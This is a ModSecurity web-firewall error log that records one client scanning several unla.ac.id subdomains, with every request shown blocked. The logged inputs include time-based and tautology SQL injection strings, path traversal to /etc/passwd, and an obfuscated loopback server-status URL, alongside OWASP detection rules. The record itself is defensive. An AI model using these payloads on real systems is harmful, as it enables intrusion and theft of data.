[Tue Aug 29 11:35:08.357930 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11fMCo-f0AAAUNal4AAABF"]
[Tue Aug 29 11:35:08.358894 2023] [:error] [pid 1234] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAATSkokAAAAT"]
[Tue Aug 29 11:35:08.382243 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAAPLwKoAAAAX"]
[Tue Aug 29 11:35:09.343017 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAARdiTwAAAAK"]
[Tue Aug 29 11:35:09.354034 2023] [:error] [pid 1248] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAATge7QAAAAl"]
[Tue Aug 29 11:35:09.354644 2023] [:error] [pid 1354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAAVK0IQAAAAB"]
[Tue Aug 29 11:35:09.358084 2023] [:error] [pid 1360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAAVQYygAAAAI"]
[Tue Aug 29 11:35:09.363017 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fcCo-f0AAATzVJwAAAAx"]
[Tue Aug 29 11:35:10.304244 2023] [:error] [pid 1359] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fsCo-f0AAAVPX3cAAAAF"]
[Tue Aug 29 11:35:10.336780 2023] [:error] [pid 1294] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAAUOaVYAAABG"]
[Tue Aug 29 11:35:10.341128 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAAVJXlUAAAAA"]
[Tue Aug 29 11:35:10.346177 2023] [:error] [pid 1265] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAATxvZUAAAAw"]
[Tue Aug 29 11:35:10.347403 2023] [:error] [pid 1231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAATPtTgAAAAM"]
[Tue Aug 29 11:35:10.350904 2023] [:error] [pid 1289] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAAUJIzgAAABB"]
[Tue Aug 29 11:35:10.352284 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAAPLwKwAAAAX"]
[Tue Aug 29 11:35:10.354239 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAAUKhBQAAABC"]
[Tue Aug 29 11:35:10.354728 2023] [:error] [pid 1253] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAATlLGAAAAAq"]
[Tue Aug 29 11:35:10.355429 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11fsCo-f0AAATQXi4AAAAO"]
[Tue Aug 29 11:35:10.355858 2023] [:error] [pid 1283] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAAUDQUYAAAA7"]
[Tue Aug 29 11:35:10.356729 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAATzVJ4AAAAx"]
[Tue Aug 29 11:35:10.358368 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAATWYSwAAAAa"]
[Tue Aug 29 11:35:10.360614 2023] [:error] [pid 1247] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11fsCo-f0AAATfd4wAAAAk"]
[Tue Aug 29 11:35:10.363239 2023] [:error] [pid 1286] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAAUGZBEAAAA@"]
[Tue Aug 29 11:35:10.363966 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fsCo-f0AAAUUZ9UAAABK"]
[Tue Aug 29 11:35:10.364584 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:url: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "ZO11fsCo-f0AAASOUqsAAAAR"]
[Tue Aug 29 11:35:11.303862 2023] [:error] [pid 1300] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"_fp_. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22_fp_: \\x22_fp_"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/HandleEvent"] [unique_id "ZO11f8Co-f0AAAUUZ9YAAABK"]
[Tue Aug 29 11:35:11.309990 2023] [:error] [pid 1303] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:page: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO11f8Co-f0AAAUXLkgAAABM"]
[Tue Aug 29 11:35:11.358728 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )-- - found within ARGS:s: 1' AND (SELECT 1 FROM (SELECT(SLEEP(6)))a)-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11f8Co-f0AAATzVKAAAAAx"]
[Tue Aug 29 11:35:12.321183 2023] [:error] [pid 1236] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAATUxSoAAAAW"]
[Tue Aug 29 11:35:12.323983 2023] [:error] [pid 1238] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:id: ' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11gMCo-f0AAATWYS8AAAAa"]
[Tue Aug 29 11:35:12.331374 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://0177.0.0.1/server-status found within TX:1: 0177.0.0.1/server-status"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11gMCo-f0AAAVWP-8AAAAV"]
